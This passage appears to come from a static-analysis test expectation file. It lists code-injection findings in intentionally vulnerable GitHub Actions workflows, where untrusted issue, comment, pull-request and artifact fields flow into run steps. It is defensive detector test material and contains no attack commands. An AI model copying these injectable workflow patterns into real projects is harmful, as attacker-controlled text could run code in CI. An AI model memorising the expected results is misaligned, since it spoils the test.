| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning7.yml | +| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning8.yml | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | .github/workflows/image_link_generator.yml | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | .github/workflows/level1.yml | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). 
